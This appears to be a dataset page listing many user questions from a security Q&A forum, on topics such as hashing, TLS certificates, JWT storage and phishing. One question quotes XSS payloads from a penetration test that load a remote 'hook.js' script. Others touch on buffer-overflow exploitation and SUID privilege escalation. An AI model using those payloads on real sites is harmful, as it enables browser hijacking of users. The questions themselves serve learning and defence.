instruction stringlengths 24 29.9k |
|---|
I'm reading a lot about entropy on macOS...
I know it doesn't use Yarrow anymore as per this FIPS 140-02 doc a NIST compliant DRBG.
I read a lot:
https://github.com/briansmith/ring/pull/398
How can I measure (and increase) entropy on Mac OS X?
https://stackoverflow.com/questions/5832941/how-good-is-secrandomcopybytes
... |
I'm implementing an OCSP server to answer OCSP requests for my custom CA.
I already implemented the invalidation of leaves certificates, with the intermediate CA certificate signing the OCSP response, and it seems to be working.
However, I have troubles implementing the OCSP response to invalidate a intermediate certif... |
Imagine a login system is being created, and a user's password is hashed thusly:
Users.password = PBKDF2(salt1 + password + salt2)
The result of that ^ operation and salt1 are stored side-by-side in the same table, let's say Users.
salt2, however, is stored in a random row in a separate table called UnorderedSalts.
Wh... |
My question is similar to these:
Protect sensitive data from sysadmin prying eyes
Restrict access to a specific directory on Linux
From those, I understand that SELinux could accomplish my goal. But we do not have the resources to use SELinux, so I want to know if there is another way -- specifically Grsecurity (or... |
I have recently heard that XSS + CSRF = stored XSS. I didn't think too much about it at the time, but now it's bugging me, because it doesn't make too much sense.
I would say that it can stand true, if the XSS was "self-stored XSS" for which CSRF is used to get rid of the "self" part.
Other than that, I don't see any o... |
Here is a link from an SMS I received abev1o.yzv.jp.
This link redirects to a somewhat random website (twitter, youtube, CNN, and others).
I downloaded the page using curl:
https://gist.github.com/serega/aab933c9104e92f189b8692912f02a52
It looks like the code is using window.location. The websites the script redirects... |
Let's say a website has two vulnerabilities:
Information Disclosure
reflected XSS
Their impact by themselves is limited on the specific site, but when chained together, the impact is raised too high (e.g. transfer money to another account)
What would be the most appropriate way to present those vulnerabilities?
For b... |
I got a typical login setup: Username/password that is passed to server, hashed/salted with PBKDF2, then compared to hashed/salted entry in login database. After that, JWT token is generated and returned to client.
However, after login an AES-256 encrypted SQLite database file needs to be accessed for that user. I obv... |
I'm a PHP web developer who has been trying to learn and understand how to encrypt and secure the data stored on a database with PHP Sodium.
In terms of security knowledge I am very new to the area besides applying basic password_hash / password_verify with bycrypt for passwords and use PDO actively when handling data,... |
Trying to figure out the patterns of passwords. I'm new to ML, but was inspired by PassGan, a ML tool that generates sample passwords. The likelihood is low enough that it's not very useful for password cracking, but I'd like to take the technique and use it for password discovery.
My intention is to train a model to... |
AFAIK in most OSes an app is given access to USB and Bluetooth and it's fairly blanket access. I believe maybe iOS now has per app Bluetooth access controls but if you give an app bluetooth access it now has low-level access to Bluetooth.
Are there any standards for changing that to per app per device access? In other ... |
I deployed a laravel project to a server (in which I have root access). Then I was asked to install a ssl certificate to that project. But there are some projects that already have installed a ssl certificate in the server.
My question is if I install another ssl certificate (for example: Let's Encrypt's free ssl certi... |
Say that a web server supports both HTTP and HTTPS. If a browser fetches the same JavaScript with a HTTP GET and a HTTPS GET, and the JavaScript is cache-able, will the browser cache two copies of the same JavaScript?
The reason I'm asking is that if only one copy is cached, would it be possible for an attacker to firs... |
I have server certificates for making SSL connection. So, whenever I execute
openssl s_client -engine gost -CApath /usr/local/share/ca-certificates/ -connect lk.egrz.ru:443 -servername lk.egrz.ru
I get
SSL-Session:
Protocol : TLSv1
Cipher : GOST2001-GOST89-GOST89
Session-ID: 50AA2B055BC60403A82DBADAD80... |
I was browsing Goodreads.com with uBlock origin installed on my browser. I'm not a web developer but, I understand that some websites send requests to "ajax.googleapis.com" in order to design their UI. This website (security.stackexchange.com) does it too.
From the above screenshot, it's clear that ajax google APIs we... |
I saw on my SMTP logs that it queried a possible phishing domain, I look up on its MX records and it didn't have one. Does the domain need an MX record before sending phishing emails?
|
Description:
I want to create an upload center for small files (word/excel/zip documents etc) with PHP.
I want to protect files uploaded by user as much as possible, so if server is breached, attacker cannot read/open these files.
I just want to minimize the damage in case of a breach/attack.
If all encrypted files ar... |
Disclaimer I am not a security professional, just a programmer trying to do my best. Additionally, this is my first post to this community so I appologise if this question is too broad.
The Situation My local network (managed and secured by a professional IT team) has many devices on it running simple web servers tha... |
I am thinking to implement a REST service that needs to call another REST service that is protected by OAuth2.
My service is "always" called server to server by web applications.
The user interacts with the web applications using their authentication.
The server-to-server call is executed on behalf of the authenticated... |
I have a need to generate a key consisting of a given number of random characters that will be used to access resources via a public API. It should not be possible to predict the key. This is done in Java. I can use a SecureRandom instance but this can be slow because it needs to gather enough entropy from the underlyi... |
I have a question about Self Signed Certs that I couldn't find a direct answer to.
I have a site designed to be hosted on a client's server. Some of the information coming from a windows workstation to the server and back will need to be encrypted. To do this I was going to use a self signed certificate created by Ope... |
I use the following command to get a signed certificate from PKI.
What is the content of the file srvcert.crt of the option -srvcert ?
It seems the srvcert.crt file is not the public certificate of the pki_server. Indeed, I tried with it and it does not work.
openssl cmp -cmd ir -server pki_server:8040 \
-path signing-... |
After reading some popular questions and answer on this website about BREACH, the only advice seems to be: don't compress anything that might contain secrets (including CSRF tokens). However, that doesn't sound like great advice. Most websites are actually compressing everything, so I wonder what they are doing exactly... |
I have a client which requires some currently public API endpoints be encrypted and secure (although it's more of a checkbox than anything I worry about someone attacking, or I would not accept the task). I am using https, get and post requests from a JavaScript based phone application to a Rails backend. There is a si... |
I have the task to place an FTP server in the company DMZ for our partners to store sensitive data that can not be sent by mail.
I have chosen the IIS FTPS. I will generate a self-signed certificate for server authentication. Also, I was planning to configure client certificate authentication.
I will open Implicit FT... |
In rfc8446, it says
HKDF-Expand-Label(Secret, Label, Context, Length) =
HKDF-Expand(Secret, HkdfLabel, Length)
Where HkdfLabel is specified as:
struct {
uint16 length = Length;
opaque label<7..255> = "tls13 " + Label;
opaque context<0..255> = Context;
} HkdfLabel;
Derive-Secret(Secret, Label, Message... |
INTRODUCTION
First of all, I'm a beginner in RSA mechanisms and similar but I'm really interested in knowing if this is possible.
In this scenario, I organized a party where certain people receive a special invitation voucher I made with my private key. They will later use it to enter and I will check if it is valid wi... |
For systems that only connect to the internet via a single dedicated private network (no WiFi hotspots), and assuming no systems or components on that network are compromised, does HSTS (HTTP Strict Transport Security) provide any security advantages?
|
I've already seen on Windows what kind of information the Steam application is sending online: time, place and device of the connection, time passed playing the games, payments, mail, numbers, etc. All this data looks related to the use of that precise application.
However, what is preventing any desktop app from sendi... |
The topics about secure erase for IOS on this site is a bit dated. Technology has definitely changed, including the tools used for forensics. Are there any secure erase softwares or techniques that someone could use to prevent any data recovery? Overwriting the data over and over again using the DoD 5220.22M technique ... |
Frequently, I'd say in virtually every case, there is only one PHP library for any particular problem. (I don't count obsolete, abandoned, trash ones.)
Therefore, it's never a "choice" by me to use it. I have to either use it or nothing.
For this simple reason, the sound-sounding safety advice to "not use obscure libra... |
Is this the right way to crack a password hashed with PHP?
I used the password_hash function to hash a password (PHP version 7.3).
Then I created a word list using a Python script. It's around 1GB in size.
Then I created a PHP script to read that word list and check the password using password_hash.
Finally I executed... |
I've used x64dbg to work out decryption in a particular program. I've found where it changes the encrypted material into readable text but can't work out the best way to use this information to convert multiple files.
Is it a standardized encryption method? (eg. blowfish/aes)
It basically copies the file to memory t... |
tl;dr
I would love a detailed explanation how user-controlled input goes from readObject to RCE. Java-specific.
The background
This is my attempt to add specificity to the OP question as requested in the answer here.
I have been slowly but surely breaking into web app security from a network/infra pentesting and binary... |
We want token of the user generated in Mobile App SignIn to be transferred to the WebUI what would be the better approach for sharing confidential data to the WebUI.
Do we follow something like https://example.com/redirect?token=12121 this?
|
Unlike other Web standards, HTTP cookies don't use the common definition of the "origin" as with the "same origin policy"; cookies are segregated by domain names and subdomains. (And there is the secure flag to only return the cookie inside an HTTPS connection, which is yet another subtle matter.)
To determine whether ... |
Today I have received an SMS from the number that my credit card provider uses to send MTANs that have to be entered for e-commerce. So at first the obvious scam seemed to be someone trying to use my credit card for an e-commerce transaction. However checking with the credit card provider they mentioned, that this numb... |
I run an OpenLDAP server on which there is some data I wanted to encrypt.
I cannot use a userPassword like attributes as this is hash. In my case I need to crypt/decrypt it with a secret key.
But if I do so, i'll not be able anymore to perform ldapsearch request with these attributes in my filter (as they are encrypted... |
I am working on a web-app where user can access his purchased item using two word/Number combination and then user add card details on same page for the payment of those item.
Point to be noted
I keep the item record on basis of those 2 Word/Number.
Payment details are verified from third party if details are correc... |
I was writing an exploit for BOF. The server accepts only ASCII payloads. FInally I wnted to jump to my shellcode which is clearly in the stack. But only one module is available without ASLR and DEP which has address starting from 56566577. I got JUMP ESP, suppose in 5757578E, this doesn't work. Becuase the 0x8E outsid... |
I was reading the post Is it safe/wise to store a salt in the same field as the hashed password?:
$argon2i$v=19$m=65536,t=3,p=1$YOtX2//7NoD/owm8RZ8llw==$fPn4sPgkFAuBJo3M3UzcGss3dJysxLJdPdvojRF20ZE=
My understanding is that everything prior to p= are parameters, the body of the p= is the salt, and the last part is the ... |
So I recently ordered a chinese external USB card and I would like to find out whether it has some hidden functionality, which might become malicious. It has buttons integrated in it so Linux using libusb -vv displays it of having HID capabilities, which already alerted me since it could be used to inject keystrokes.
... |
My work requires (and depends on) Whatsapp for daily sharing of files with many people (PDF, PowerPoint, Word, Images, Web links...), and I was wondering if it is possible that someone can hack our phones by sending us malware via Whatsapp.
For example, let's say they send me a virus that pretends to be a legitimate PD... |
If you first encrypt a password using a secure key, and then hash the result, and both algorithms are fast, say sha_256(salt+aes_256(password, secure_key)), would that make the hash expensive to brute-force without making it expensive to generate?
[Addendum for clarification]
I have a security concern with slow hashes ... |
I learned that a device probably has a device fingerprint to the eyes of a company that operates online. I'm not sure how this fingerprint is managed by its collectors, but it's plausible that it could be shared and spread between the companies themselves, as it could be easily found out in some online news.
However I'... |
New to buffer overflow through image parsing. How can one design a secure library that parses images, and ensure there are no security vulnerabilities in it? It is common knowledge that image parsing libraries are vulnerable to Buffer Overflow, so I would appreciate it if someone could specifically explain how to secur... |
I am setting up some new configurations with rclone to backup stuff to google drive. I am configuring application with the steps on https://rclone.org/drive/#making-your-own-client-id
When I am going through google's oauth process, I am presented with a warning from google
I have got the binary from rclone's github re... |
The IKE_SA_INIT does create a key seed SKEYSEED from the Diffie-Hellman values and nonces. Since the exchange does sharing the secret between the communication partners, I do not understand why it is not enough for authentication.
|
My app needs to work with encrypted user files on their devices. It should keep the data secret when someone gets hold of the device. For this, I'm thinking about the following schema (which may be wrong, and that's why I'm asking).
The app generates a random key k (of a fixed predefined length), which will be used as... |
Suppose you have the following code in Node:
const { token } = req.body
const hash = crypto.createHmac('sha256', SECRET).update(token).digest('hex')
const user = await User.findById(req.session.userId)
if (hash === user.rememberMeHash) {/*...*/}
The string comparison above is deemed vulnerable to a timing attack beca... |
The police in Canada are saying that there is a new technique ("line-trapping") where the scammers told a lady to call the police to confirm some fraudulent details, but when she hung up and called the police, the scammers were still on the line and acted as the police. The article does not get into any technical detai... |
I was looking to purchase a new SSD and want to use it to store sensitive data, that I would not want people to steal or access.
Have been trying to research it and only read bad things about hardware encryption.
Here is an example: https://www.tomshardware.com/news/crucial-samsung-ssd-encryption-bypassed,38025.html
An... |
When we write a HTML page with form tag and an action attribute and a submit button. As soon as we click on submit a request is sent (with cookies) to the URL which was the value of action attribute.
But if we send cross domain request to the same domain with JS's XHR cookies won't be sent.
In both cases, requests are... |
I am dabbling in pen testing (OWASP Juice Shop) and I realized many web application attacks start from enumeration where the attacker uses DirB to find vulnerable Web Objects or Directories to attack or access. So what i want to know is how to prevent such things from happening, to stop the attack before it can occur.
... |
Let's say there is a target machine T, to which I want to connect. T is in a private network so I need to connect to it via some proxy machine P (which is connected to that network). For this reason I first ssh to P and from there I ssh again to T.
Let's assume P is malicious. How dangerous is can that be for my machin... |
I want to run an application on macOS, but preventing it from making any type of network access, or any type of internet access.
I have seen the following possibilities:
Use the built-in firewall. Unfortunately, this blocks only inbound connections, not outbound.
I have seen Little Snitch. However, it feels uncomforta... |
quoting from Referer header: privacy and security concerns
For example, consider a "reset password" page with a social media link
in a footer. If the link was followed, depending on how information
was shared the social media site may receive the reset password URL
and may still be able to use the shared information, ... |
I want to use Shamir's Secret Sharing algorithm to store a randomly generated passphrase securely by spreading the secret shares on paper for example.
The passphrase is generated on an offline system. I am looking for a way to ease the process of "exporting" those secrets which can be quite long (~100 hexadecimal chara... |
I was practising some labs to get better at XSS and SSRF. I found that sometimes I just encode characters once and the security filter is bypassed and occasionally I have to encode it two times.
How does the filter work in the backend? Can someone explain with a scenario?
|
I recently got my digital certificate to sign my software.
Today I signed my first piece of software, it all went well until, I got the error, "A certificate contains an unknown extension that is marked "critical.""
When I check if the signature is fine, you know on properties in Windows.
I am in need of help, how can... |
I am trying to achieve a privilege escalation. I have a virtual machine on Linux and I escaped from an rbash terminal. I have now a "normal" user terminal. My user is not in the sudoers file.
Is it possible to perform a privilege escalation using the ping command?
SUID bit is permitted for /bin/ping but I do not know h... |
I am trying to create a peer-to-peer escrow system. I need to encrypt the private key of a wallet with a 2-of-3 secret-sharing function - the buyer, seller, and arbitrator will each have have one key.
The problem lies in the generation of secret keys on a p2p network, as there is no trusted server. What can I do to pre... |
I am using Angular 8 with Node.js (Express.js) to make a login system. It needs to be secure. I have set the cookies using httpOnly:true, which contain a JWT token and it should be deleted by the server-side, since httpOnly cookies can only be deleted by the user manually (not an option) or by the Web Server.
How do I... |
In the TLS Handshake a Certificate message is sent. This message contains the (chain of) certificates needed to validate the provided certificate of the communicating party.
However, I have also read some papers, and also defined in RFC5280, that the certification path process is challenging; and, an algorithm is need... |
I am working on ensuring security of my company's product. We have a mobile version of the product. This question is for the Android version
Background -
Our product is a SaaS-based product and the app is meant to be used by different salespeople of tenant organisation. We have implemented different layers of control f... |
I am wondering if it is smart to hash my session IDs before writing sessions to the session storage, in order to prevent session ID disclosure.
I am writing an application in PHP on top of the Symfony framework. By default PHP stores sessions as files in a directory readable by the PHP process using the session ID as p... |
As I read through the WebAuthn / FIDO2 documentation, it appears the authentication is done on the local device to create an attestation to the FIDO server. This future implies the "biometrics" or other Authenticator means must be connected to the local client/browser.
I am wondering if the current FIDO2/WebAuthn stan... |
In my web application, while doing the penetration testing two XSS vulnerabilities identified in some text input.
that field testing using followin cheets,
<script src="http://192.168.1.122:3000/hook.js"></script>
<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:P... |
My ISP, a small, local “mom & pop” outfit, provides my email services. For the last six months or so, my main email account frequently fails to update with the following message, “Could not connect to server mail.win.net; the connection was refused.” Sometimes it works, sometimes it doesn’t. Interestingly, my other ... |
Accessing a webservice/website via IP with https eg. https://x.x.x.x/
the browser shows that the connection is not secure.
Is the connection actually secure/encrypted or not (more secure than http)?
|
Can an SD card be used as a medium of implementing a keylogger? The location of an SD card slot on some laptops is such that it is impossible to see if it contains a card in it unless you deliberately check it, so it could be an easy spot to put a keylogger. But from what I understand an SD card slot unlike a USB one u... |
The PHP code has a handleRoute($path) function that is triggered for URLs like server.com/routeme/a. Handle route has the follwing: if file_exists($path) then include $path.
The $path argument is /srv/dirs/routeme/a.
A Google search leads to a million results where the file name is directly read from a parameter. Whe... |
I was wondering if someone providing a service can identify me (other than by IP, browser fingerprinting etc.) purely based on the code generated by the Yubikey when I touch it, if I use the same Yubikey on two different accounts.
I.e. will the provider know implicitly that the same Yubikey was used?
|
Apple’s FaceID on iPhone X works even in the dark using infrared light to “illuminate” your face with an IR projection and collect the features.
When designing the algorithms that confirm a user’s face, does Apple lower the “validation thresholds” when running in the dark to ensure a better user experience?
Can an atta... |
The other day one of my VPS instances got inaccessible, for no apparent reason. Neither could I connect to it via ssh, nor it responded to ping. After several exchanges with the support of the VPS hosting provider (specifically, Vultr), they eventually told me: somebody hijacked an IP range (xxx.xxx.xxx.0/24) that incl... |
The Jurassic Park scene referenced in the title is infamous for how ludicrous it sounds to those who are tech literate. But it also illustrates what seems to me to be a glaringly huge hole in web security, particularly IoT devices--as soon as attackers find out a server or camera or baby monitor is running linux, they... |
I don't know much about hashing, but I noticed a (relatively reputable) site logging me into my account by sending the url parameter "hash=longStringIAssumeisTheHashOfMyPassword".
The point of hashing passwords is so that if an attacker gained a list of all of the hashed passwords, they still wouldn't be able to get in... |
It is well-known that third-party JavaScript inclusion is risky, I wonder what actual damage can be caused if the third-party script is malicious. Of course the script can cause as much damage as possible to its own DOM, other than that, can it affect other DOMs, can it cause any damage to the browser or the host compu... |
I'm currently trying to see if it's possible to sniff MQTT packets between two raspberry pi's from a wireless adapter in monitor mode attached to my PC.
I ran the following command on my PC (Kali Linux):
sudo airmon-ng start wlan1 11
where the wifi network my rPi's are on is operating on channel 11. For simplicity, I ... |
Could somebody explain how and why a majority of new webapps are storing their JWTs/tokens in localStorage? It doesn't seem to be by chance, anyone familiar with this history and perhaps factors from the industry that lead to this. This is just a terrible idea all-round! Did everyone suddenly become so confident that t... |
Recently I attended a workshop were the presenter explained securing rest APIs.
One of the things he recommended to avoid man in the middle attacks was to not send IDs in the URLs (i.e. not sending the IDs as path parameters For e.g. Don't do this : GET /orders/{order-id}). This way a malicious hacker will not be able ... |
I was working on a web app and as I was building the front-end for a search function I tried to see if it would be vulnerable to XSS.
After pressing the search button, the js code will generate a paragraph with the search value and append it to the div, and when the paragraph exists it will just modify the innerHTML pr... |
I read that Golang was used to create malware. Is it good? Will it stay undetected? What will be its performance?
|
I am integrating a website with 3rd party API. The 3rd party site allows me to generate Access Token by using Client Key/Client Secret.
In one of the pages, I need to redirect to 3rd party site 's web page, which needs an AccessToken to validate if the page is redirected from the valid client or not.
The Access Token w... |
So, I know Remote File Inclusion bugs are practically dead within modern PHP applications since register_globals and allow_url_includes are disabled by default in php.ini (ever since php5x I believe?) but I'm wondering whether it's still a viable attack affecting other web-based lanuages?
Does anyone know if other serv... |
Ubuntu 20.04
iptables 1.8.4-1
I experienced a situation where a remote system seemed to be able to slip through the first iptables rule of a Linux server located behind a NAT router:
-A INPUT -s <remote_ip_addresses_range> -j DROP
Despite the above rule, I was able to witness the following snapshot using pktstat -tF ... |
Given...
a public web service with enabled SSL/TLS
the web service enforces authentication using JSON Web Tokens
a client on a LAN without an Internet connection
a proxy on the LAN that grants point-to-point connections to mentioned web service
When.
I want to connect to the proxy in order to access the web services... |
Seeing as SSL-strip works by intercepting redirects and links to HTTPS, is this still a viable MITM attack now that most (all?) up to date browser go for HTTPS by default? Is there an alternative more suitable to a present day scenario?
|
I am trying to copy some NFC card; however the SAK returned is always 08h using the command nfc-list. However looking through the actual content of the card, I can see that the byte associated to the SAK is different (88h).
After making a full copy of the card, doing a full copy of both shows the exact same content, ex... |
Say I have a Linux server running on my own metal and wish to encrypt the hard drive using LUKS.
After a power failure, how can I enter my passphrase remotely without compromising it?
|
I was listening to a podcast about cybersecurity, and I heard that a public JavaScript library was compromised by attackers who injected a credit card scraper into the library, and then every site that used that library was now a source of credit card info for the attackers.
I was thinking, how would that even work? A... |
When I'm working on hack boxes, what I do (if not using Armitage) is:
nmap the box to discover running services version
search metasploit to find a working exploit for that version
Now I'm stuck. What if the running service version is not vulnerable or the service version is said to have a vulnerability but not publi... |
Many Windows and Linux services are written in C and/or C++. Due to that fact, they can be exploited in several ways due to the lack of memory security (buffer overflow, etc.).
Are services written in Python/Java safer than those written in C/C++?
Would a whole operating system based on Java/Python (if thats even possi... |
I'm trying to automate an authentication canary in a workflow that includes a mandatory Yubikey OTP (the 44-character unique password). Is there a way to configure a single Yubikey in such a way that I can generate the Yubikey long-touch OTP via script or API call without requiring touch?
|
There is a publicly available tool called HTran which is widely used by criminal groups in cyberattacks to exfiltrate data. It simply relays traffic from one host to another, much like a proxy. It is typically used to relay information from an internal network that does not allow internet access, but allows access to t... |
I am working with OpenSSL using Windows 10 CMD.
I am trying to encrypt something using triple des with key coded in base64 that stored in text file (assume that plain text is:"hi all I am someone", key.txt (key 24 byte coded in base64)), so I wrote this command line:
openssl enc -des-ede3 -pbkdf2 -base64 -in input.txt ... |
Here is my keepass setup:
Cloud
Gmail 1 Google Drive: holds database
Gmail 2 Google Drive: holds key file
Hard Drive
Computer: holds database (leave at home)
USB 1: holds database (always have with me)
USB 2: holds key file (leave at home)
USB 3: holds key file (always have with me)
USB 4: holds Gmail 1 id, Gmail 2... |
The idea is the following:
I have a port open (P) on a remote machine (R) with a service application running which is listening on (P). I would like to connect from a client machine to the service application on the remote machine.
Possibility 1:
I leave the port open so I can connect directly from my client via the i... |
I'm learning about privacy and security and one of the tips everyone always talk about is compartmentalization, I'm trying to do this and get rid of my old profiles in social media (one of them have 10 years since I made it), I'm planing to make new ones where I won't be giving up too much information about myself.
The... |
I have a signed JAR. How could I check if the corresponding code-signing certificate was revoked? Technically there seem to be the following options:
The Java TrustStore holds CRLs/revoked certificates.
The JarSigner checks CRLs automatically or manually.
However, keytool doesnt have a command line options to import ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.